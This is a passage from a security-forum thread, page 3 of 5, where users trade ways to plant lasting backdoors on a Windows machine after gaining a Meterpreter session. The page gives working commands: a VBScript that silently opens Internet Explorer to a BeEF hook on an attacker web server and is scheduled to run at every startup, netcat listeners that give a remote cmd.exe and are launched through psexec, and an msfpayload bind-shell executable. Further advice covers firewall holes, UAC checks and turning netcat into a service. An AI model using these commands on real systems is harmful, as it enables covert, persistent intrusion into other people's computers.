Page 3 of 5 FirstFirst 12345 LastLast
Results 21 to 30 of 45

Thread: Opening backdoor after getting meterpreter session

  1. #21

    Default

    some notes:
    1. for backdoors use bind shells since they will open the port and just listen.
    2. you have to open the port in the local firewall is it is enabled
    3. if your target is behind a firewall it is useless to set a listening backdoor only a call home backdoor should be used, example running a hidden iexplorer process connecting to a BEEF web server.
    4. you have to be hacking naked(Directly connected to the Internet not behind a NAT router or with local firewall on)


    Did you check that local firewall was not running?
    netsh firewall show opmode

    I did not see any mentioning that you tried to enable install/enable Telnet or enable RDP on the target machine, what errors are you getting? you might not have the appropriate permissions on the target machine, whe you do in meterpreter a getuid or in shell whoami are you running as system or as a user? also check if UAC is enabled by running in shell reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\System /v EnableLUA if set to 1 then it is enable and unless you are running as system you will not be able to disable it, heck if you are nor system and UAC is aneble you will not be able to punch a hole in the local firewall and a reverse shell will be needed.

  2. #22

    Default

    to make a beef backdoor first do the following, we create a vbscript that will launch a hidden iexplorer pointed to our beef server:
    Code:
    echo CreateObject("Wscript.Shell").Run "iexplore.exe -new http://yourevilwebserver/beef/hook/beefmagic.js.php", 0, False > c:\temp.vbs
    then we create batch script that will call this vbscript

    Code:
    echo wscript c:\temp.vbs > backdoor.cmd
    the schedule it for every time the target is rebooted:
    Code:
    schtasks /create /tn "SysCheckonStart" /tr c:\ backdoor.cmd /sc onstart
    run the script just to make sure it works in meterpreter :
    Code:
    execute -H -f cmd.exe -a "/c c:\ backdoor.cmd"

  3. #23

    Default

    Quote Originally Posted by Tr00g33k View Post
    Portfwrd in metasploit, actualy forward port through router, firewall,etc.(it`s meant to do this)?If I understand correctly?

    Tr00G33k
    it will portforward any remote port to a local port through the Meterpreter channel, useful for when wanting to connect to the targets RDP or Telnet.
    good example:
    http://hkashfi.blogspot.com/2008/04/...with-port.html

  4. #24
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by BadKarmaPR View Post
    some notes:
    1. for backdoors use bind shells since they will open the port and just listen.
    2. you have to open the port in the local firewall is it is enabled
    3. if your target is behind a firewall it is useless to set a listening backdoor only a call home backdoor should be used, example running a hidden iexplorer process connecting to a BEEF web server.
    4. you have to be hacking naked(Directly connected to the Internet not behind a NAT router or with local firewall on)
    So, this should work well for the exe? After few seconds of running, vista shows that "listen.exe has stopped working.........."
    Code:
    ./msfpayload windows/meterpreter/bind_tcp LPORT=10000 R | ./msfencode -c 2 -t exe -o listen.exe
    Long before, I disabled UAC & firewall of the vista (victim) box.
    However, i have a router in between BT3 box & the broadband modem. This enables my box to connect wirelessly. Should I connect directly to the modem by wire or is that ok?

    Did you check that local firewall was not running?
    netsh firewall show opmode
    I didn't enable it for BT3 (unless it's up by default). "netsh" doesn't work for BT3, you know.

    I did not see any mentioning that you tried to enable install/enable Telnet or enable RDP on the target machine, what errors are you getting? you might not have the appropriate permissions on the target machine, whe you do in meterpreter a getuid or in shell whoami are you running as system or as a user? also check if UAC is enabled by running in shell reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\System /v EnableLUA if set to 1 then it is enable and unless you are running as system you will not be able to disable it, heck if you are nor system and UAC is aneble you will not be able to punch a hole in the local firewall and a reverse shell will be needed.
    I'm running vista with administrative privilege...

    Edit:
    The exe file did open a port before stopped working. nmap scan result:
    10000/tcp open snet-sensor-mgmt

  5. #25

    Default

    netsh is a windows command to configure network settings not a linux command, I would recommend that you first get a Netcat backdoor working since it is the simplest. nc -L -d -p <backdoor port of choice> -t -e cmd.exe

  6. #26
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    Quote Originally Posted by kazalku View Post
    Edit:
    The exe file did open a port before stopped working. nmap scan result:
    That is normal. I tried once myself to use meterpreter as a backdoor - but whenever you scan the port with nmap the .exe crashes :S, pretty annoying.
    - Poul Wittig

  7. #27
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by BadKarmaPR View Post
    netsh is a windows command to configure network settings not a linux command, I would recommend that you first get a Netcat backdoor working since it is the simplest. nc -L -d -p <backdoor port of choice> -t -e cmd.exe
    I did this in first place. After getting the meterpreter session, I opened 2 backdoors in the vista box for future invasion.

    Code:
    cd c:\
    mkdir xxx
    ls
    cd xxx
    upload /root/nc111nt/nc.exe nc.exe
    upload /root/PsTools/psexec.exe psexec.exe
    execute -f cmd.exe -c -H -i
    psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 8888
    psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 9999
    Then I ended the meterpreter session. Previously, I configured (port-forwarding) victim's router to forward port 9999 request to 192.168.1.2 (which is stationary for the vista laptop). I know that this may not be possible in real world.

    Now, from the BT3 box:
    Code:
    nc 82.24.180.15;) 9999 =======> works & gives the command shell
    nc 82.24.180.15;) 8888 =======> does not work
    I can easily understand why the 2nd command is not working, because we didn't ask the router to forward 8888 request to vista box. And, as I mentioned earlier, in the real world I (or the attacker) wouldn't be able to configure the router. OR am I wrong? It's really tough to think that I can access another router without actually connecting to that (unless remote management is enabled by some dumb **s).

    Now, I tried few other things:
    1) Tried "Back Orifice 2000 from sourceforge", but couldn't upload it because of the AV (Avast!, really good). So, I didn't go further. I'm sure that the AV will catch "sub 7" etc etc as well.

    2) Saved the exe file in windows folder & edited remote registry to run it every time the computer restarts. This one works but this is NOT a true backdoor. I will have to switch on my BT3 box first thing in the morning (before the other machine starts) & if I miss it then will have to wait until other one restarts.

    Any ideas, how to open a REAL backdoor? Thanks for your support.

  8. #28

    Default

    netcat is a true backdoor, it has to be the most flexible tool there is, I would suggest cryptcat for pentest, but then again rarely in a pentest the ROE let us place backdoor because we add risk to the clients environment, in most pentest shops you will find that they have a server in a colo or on a unfiltered connection to the internet for the purpose of running servers that are always on for this type of attacks, I do prefer some type of multi handler in the web that can act as a third person for attacks and shells. I would suggest learning how to use the sc command in windows to launch a cmd.exe that will call another cmd.exe that runs nc so it will not die when the first cmd.exe runs, also look at inguardians servifythis to make nc into a service and use sc to configure it so that it will always be on.

  9. #29
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    what about the meterpreter exe / service?

    http://www.phreedom.org/software/metsvc/

    This is a network service wrapper for the Meterpreter. It can be used as a Windows service, or run as a command line application.

  10. #30

    Default

    Quote Originally Posted by hm2075 View Post
    what about the meterpreter exe / service?

    http://www.phreedom.org/software/metsvc/

    This is a network service wrapper for the Meterpreter. It can be used as a Windows service, or run as a command line application.
    niceeeeeeee!!! never seen this one before, it is along the lines of using the inguardians tool and sc but in less steps.

Page 3 of 5 FirstFirst 12345 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •